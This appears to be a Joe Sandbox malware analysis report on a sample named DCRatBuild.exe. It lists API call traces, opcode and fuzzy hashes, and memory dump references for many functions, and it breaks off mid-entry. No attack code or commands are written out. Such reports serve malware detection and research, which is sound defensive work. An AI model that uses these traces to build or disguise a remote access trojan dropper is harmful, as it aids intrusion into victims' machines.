                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: 0bb90e2813c60d32aea0042b3c5f70d972ba78f88e1297702b7c6207ed0c3b55
                                      • Instruction ID: d249420cded954604a1d79406eed87040569e23c33479e9958eb7896bce27cdb
                                      • Opcode Fuzzy Hash: 0bb90e2813c60d32aea0042b3c5f70d972ba78f88e1297702b7c6207ed0c3b55
                                      • Instruction Fuzzy Hash: 9B51D572A10226EFDB259E64EC41FBB77AAEB40770F154629FC04D6180DB39DC50E6A1

                                      Control-flow Graph

control_flow_graph: function entry at f1a2c7 (rendered basic-block graph with executed/not-executed marking; edge list not reproduced in text)
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000050), ref: 00F1A2DE
                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00F1A315
                                        • Part of subcall function 00F117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F0BB05,00000000,.exe,?,?,00000800,?,?,00F185DF,?), ref: 00F117C2
                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00F1A305
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                      • String ID: @Uxu$EDIT
                                      • API String ID: 4243998846-59804995
                                      • Opcode ID: c67b2b1dbda5f87a30d41e5cb816ebbb05553b7e5fe991aa287b4a508c74bd0c
                                      • Instruction ID: c8c57fc8591f9bfe7dcc4247b785d5ed54402f018e8d0b1bd7f93e8e07644b69
                                      • Opcode Fuzzy Hash: c67b2b1dbda5f87a30d41e5cb816ebbb05553b7e5fe991aa287b4a508c74bd0c
                                      • Instruction Fuzzy Hash: C3F0E232E0262C77E7205A249C09FDB776C9B46B60F040052FE04A2180D7A1A991E6F6

                                      Control-flow Graph

control_flow_graph: function entry at f099b0 (rendered basic-block graph with executed/not-executed marking; edge list not reproduced in text)
                                      APIs
                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00F078AD,?,00000005,?,00000011), ref: 00F09A4C
                                      • GetLastError.KERNEL32(?,?,00F078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F09A59
                                      • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00F078AD,?,00000005,?), ref: 00F09A8E
                                      • GetLastError.KERNEL32(?,?,00F078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F09A96
                                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00F078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F09ADB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: File$CreateErrorLast$Time
                                      • String ID:
                                      • API String ID: 1999340476-0
                                      • Opcode ID: cf252a0f476855fa3fe2803de7d4898408eb2b6c4e130f7e4b0d51ef4010c19a
                                      • Instruction ID: ccd05b2c0b138e1c6f2a3ec847f12f5eeeac8113b54415c7d61a646545a475d0
                                      • Opcode Fuzzy Hash: cf252a0f476855fa3fe2803de7d4898408eb2b6c4e130f7e4b0d51ef4010c19a
                                      • Instruction Fuzzy Hash: 19414871A487466FE720DB20CC05BDABBD4BB05334F100719F5E4961D2E7B9A988FB91

                                      Control-flow Graph

control_flow_graph: function entry at f1ac74 (rendered basic-block graph with executed/not-executed marking; edge list not reproduced in text)
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1AC85
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1AC96
                                      • IsDialogMessageW.USER32(00010414,?), ref: 00F1ACAA
                                      • TranslateMessage.USER32(?), ref: 00F1ACB8
                                      • DispatchMessageW.USER32(?), ref: 00F1ACC2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 1266772231-0
                                      • Opcode ID: 6b7fbceecd7c9bcd29e29e76f671defbd124cf722e7703311319b005c258021d
                                      • Instruction ID: 4a90631a0977c562b706d77e63a8af7fc9b24858c43331472f01a57e45dc6acf
                                      • Opcode Fuzzy Hash: 6b7fbceecd7c9bcd29e29e76f671defbd124cf722e7703311319b005c258021d
                                      • Instruction Fuzzy Hash: 05F01D71D0212DBBCB609BE19C4CDEF7F6CEE052A17404515F915D2150EA64D445E7F1

                                      Control-flow Graph

control_flow_graph: function entry at f276bd (rendered basic-block graph with executed/not-executed marking; edge list not reproduced in text)
                                      APIs
                                      • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\DCRatBuild.exe,00000104), ref: 00F276FD
                                      • _free.LIBCMT ref: 00F277C8
                                      • _free.LIBCMT ref: 00F277D2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                      • API String ID: 2506810119-1920316638
                                      • Opcode ID: a82e0a91c429157653668ee975b4469d8e1eab097e13f5adf2fd9cd0fc535a78
                                      • Instruction ID: d90ce227cf7daaa8b3a4dc7bdd6635af7f8b158a6083f3881e9310052415cdc5
                                      • Opcode Fuzzy Hash: a82e0a91c429157653668ee975b4469d8e1eab097e13f5adf2fd9cd0fc535a78
                                      • Instruction Fuzzy Hash: DC31B375E09328AFDB21EF99EC81D9EBBFCEB84710F1441A6F80497211D6B44E41EB50

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00F10085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F100A0
                                        • Part of subcall function 00F10085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0EB86,Crypt32.dll,00000000,00F0EC0A,?,?,00F0EBEC,?,?,?), ref: 00F100C2
                                      • OleInitialize.OLE32(00000000), ref: 00F1A34E
                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F1A385
                                      • SHGetMalloc.SHELL32(00F48430), ref: 00F1A38F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                      • String ID: riched20.dll
                                      • API String ID: 3498096277-3360196438
                                      • Opcode ID: 82d74cf245f51fbb2c6475bc84c9c40574445037cb59f7d7749b7c5e7cce4344
                                      • Instruction ID: 78a8b8051ae13c245db7a0455cfae6bd10060082556c269c4e26836c9be36c64
                                      • Opcode Fuzzy Hash: 82d74cf245f51fbb2c6475bc84c9c40574445037cb59f7d7749b7c5e7cce4344
                                      • Instruction Fuzzy Hash: 22F049B1D0020EABCB50AF99D8499EFFBFCEF95301F00415AE824E2200CBB856459BA1
                                      Control-flow Graph
                                      control_flow_graph 1052 f1d287-f1d2b2 call f1e360 SetEnvironmentVariableW call f0fbd8 1056 f1d2b7-f1d2bb 1052->1056 1057 f1d2bd-f1d2c1 1056->1057 1058 f1d2df-f1d2e3 1056->1058 1059 f1d2ca-f1d2d1 call f0fcf1 1057->1059 1062 f1d2c3-f1d2c9 1059->1062 1063 f1d2d3-f1d2d9 SetEnvironmentVariableW 1059->1063 1062->1059 1063->1058
                                      APIs
                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00F1D29D
                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F1D2D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: EnvironmentVariable
                                      • String ID: sfxcmd$sfxpar
                                      • API String ID: 1431749950-3493335439
                                      • Opcode ID: 13ed23008673a6c7ac6fd943e349562e4a2c12c642ae343000c8f702c19bc03e
                                      • Instruction ID: a232f0bfcb33cfe9fb84f14e5b9f257f8bb7ea3045fde685c8bda50e2b27146e
                                      • Opcode Fuzzy Hash: 13ed23008673a6c7ac6fd943e349562e4a2c12c642ae343000c8f702c19bc03e
                                      • Instruction Fuzzy Hash: 8EF0A7B2D0022CA6D7206F909C0AEFA7B69EF09BA1F000411FC4456151D675CD84F6F1
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00F0985E
                                      • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00F09876
                                      • GetLastError.KERNEL32 ref: 00F098A8
                                      • GetLastError.KERNEL32 ref: 00F098C7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FileHandleRead
                                      • String ID:
                                      • API String ID: 2244327787-0
                                      • Opcode ID: 9e1ebba723c6c1033fee26dadd3fc86f9ab7dd4d773bf67e7fbc5facbb7e40c0
                                      • Instruction ID: 780637be6dd8966f8389d738775aeac9f42c48de759eb2c40a6a0b7c3bc6c6f0
                                      • Opcode Fuzzy Hash: 9e1ebba723c6c1033fee26dadd3fc86f9ab7dd4d773bf67e7fbc5facbb7e40c0
                                      • Instruction Fuzzy Hash: A411CE31D08208EBDB209B51C804A7977E9FB42731F90C12AF82A857C2F7B99E44BF51
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00F0CFE0,00000000,00000000,?,00F2A49B,00F0CFE0,00000000,00000000,00000000,?,00F2A698,00000006,FlsSetValue), ref: 00F2A526
                                      • GetLastError.KERNEL32(?,00F2A49B,00F0CFE0,00000000,00000000,00000000,?,00F2A698,00000006,FlsSetValue,00F37348,00F37350,00000000,00000364,?,00F29077), ref: 00F2A532
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F2A49B,00F0CFE0,00000000,00000000,00000000,?,00F2A698,00000006,FlsSetValue,00F37348,00F37350,00000000), ref: 00F2A540
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: 27fd0612c84837056f8dad2b9517aa223aece681aaadc2e1a41150aec9d8c75e
                                      • Instruction ID: e26f1f4ddc31523eddd5aeabb6571216fba04e756504f08e27f96679a57eabff
                                      • Opcode Fuzzy Hash: 27fd0612c84837056f8dad2b9517aa223aece681aaadc2e1a41150aec9d8c75e
                                      • Instruction Fuzzy Hash: 0F012B36B1123AABC721CB68BC45B577B99AF45BB17180520F906D7240D735DD00EAE1
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00F0CC94,00000001,?,?,?,00000000,00F14ECD,?,?,?), ref: 00F09F4C
                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00F14ECD,?,?,?,?,?,00F14972,?), ref: 00F09F8E
                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00F0CC94,00000001,?,?), ref: 00F09FB8
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: FileWrite$Handle
                                      • String ID:
                                      • API String ID: 4209713984-0
                                      • Opcode ID: 55067de34e9e08eca68a0d8ad6fa42aff377ebd05b71daa471f5d24218310563
                                      • Instruction ID: fa68d3ee2034832946290e3d160ae1c84aac71e7f8e5a4fce939192ebbe39802
                                      • Opcode Fuzzy Hash: 55067de34e9e08eca68a0d8ad6fa42aff377ebd05b71daa471f5d24218310563
                                      • Instruction Fuzzy Hash: FB31047160C30A9BDF148F14D94876ABBA8EB40721F044658F945DA1C2D7B4D848FBA2
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00F0A113,?,00000001,00000000,?,?), ref: 00F0A22E
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00F0A113,?,00000001,00000000,?,?), ref: 00F0A261
                                      • GetLastError.KERNEL32(?,?,?,?,00F0A113,?,00000001,00000000,?,?), ref: 00F0A27E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$ErrorLast
                                      • String ID:
                                      • API String ID: 2485089472-0
                                      • Opcode ID: ad60bbc7a47f589f2983879e05aa8a914a7174fd4152a170f22b28ffa4ad4511
                                      • Instruction ID: 3584ad3e903167da27da73e5d9060f461fe9aaecc7b366b015ddaf3c1e6faf19
                                      • Opcode Fuzzy Hash: ad60bbc7a47f589f2983879e05aa8a914a7174fd4152a170f22b28ffa4ad4511
                                      • Instruction Fuzzy Hash: 4501B13694071866EB32EB744C06BEE3358AF0B7A1F0444A1FC41D60D1DB6ACA81F6B3
                                      APIs
                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00F2B019
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Info
                                      • String ID:
                                      • API String ID: 1807457897-3916222277
                                      • Opcode ID: a26a287180fe3bccfd3dadd7274d92266104c5a4148f72ad2de5b7df201d0f39
                                      • Instruction ID: a0b1cdf4b5dff400d8a68cb88b72e581ea76c1b3860dc14b652e0b2ccfe37ffb
                                      • Opcode Fuzzy Hash: a26a287180fe3bccfd3dadd7274d92266104c5a4148f72ad2de5b7df201d0f39
                                      • Instruction Fuzzy Hash: 1341277190436C9BDF22CE249C94BF7BBA9EB45304F1404ECE99A87142D335AE55EF60
                                      APIs
                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00F2A79D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: String
                                      • String ID: LCMapStringEx
                                      • API String ID: 2568140703-3893581201
                                      • Opcode ID: 19acadcea91fb4e29981bc2e044b3697aa8fd62414f5f1daff041985e9547165
                                      • Instruction ID: 9e50f5dca8fe13875de62306036ebb2815ff1ca226e7e7e46d9b46833fda5c24
                                      • Opcode Fuzzy Hash: 19acadcea91fb4e29981bc2e044b3697aa8fd62414f5f1daff041985e9547165
                                      • Instruction Fuzzy Hash: 9A01C27254421DBBCF12AFA4EC06DEE3F66EF18760F044154FE1466160CA76C921FB92
                                      APIs
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00F29D2F), ref: 00F2A715
                                      Strings
                                      • InitializeCriticalSectionEx, xrefs: 00F2A6E5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CountCriticalInitializeSectionSpin
                                      • String ID: InitializeCriticalSectionEx
                                      • API String ID: 2593887523-3084827643
                                      • Opcode ID: 9ce9883c626f65d3fb6d65e3c2c46defdaecc7f6b772f0e93d6987df6b38662a
                                      • Instruction ID: 64a22ca115705fb9f7b20e7ba8f10927147986a87ce4ea5f0a3111570a58cd77
                                      • Opcode Fuzzy Hash: 9ce9883c626f65d3fb6d65e3c2c46defdaecc7f6b772f0e93d6987df6b38662a
                                      • Instruction Fuzzy Hash: 3CF0E231A4522CBBCB11BF64DC06CAE7FA2EF54730F004064FC095A260DA718E20FB92
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Alloc
                                      • String ID: FlsAlloc
                                      • API String ID: 2773662609-671089009
                                      • Opcode ID: bfc10c6c7e9c53fc4936473cf03b26bf6a749fe1a5a6291878aa058582038d1f
                                      • Instruction ID: 13b56387861bccc91e4ab9053d7aa4f46679aedb8c86c3062ee1ed4f23f1777d
                                      • Opcode Fuzzy Hash: bfc10c6c7e9c53fc4936473cf03b26bf6a749fe1a5a6291878aa058582038d1f
                                      • Instruction Fuzzy Hash: D6E0E571B4523C6BD220BB64AC079AEBB95DF65B30F450155FC095B240DE748E00B6D6
                                      APIs
                                      • try_get_function.LIBVCRUNTIME ref: 00F232AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: try_get_function
                                      • String ID: FlsAlloc
                                      • API String ID: 2742660187-671089009
                                      • Opcode ID: 00df45bc9d5d4e3ec9d3308e6e2df2d3d871c103a5270dbcbf66a9d2ae572122
                                      • Instruction ID: 2c28232de6c082bd7b30f84f2623e4afd21fc3448480325846a7d7348c2e255d
                                      • Opcode Fuzzy Hash: 00df45bc9d5d4e3ec9d3308e6e2df2d3d871c103a5270dbcbf66a9d2ae572122
                                      • Instruction Fuzzy Hash: 84D02B61B816386BC11032C07C039EE7E448741FB1F450152FE081E1828569C55071D7
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
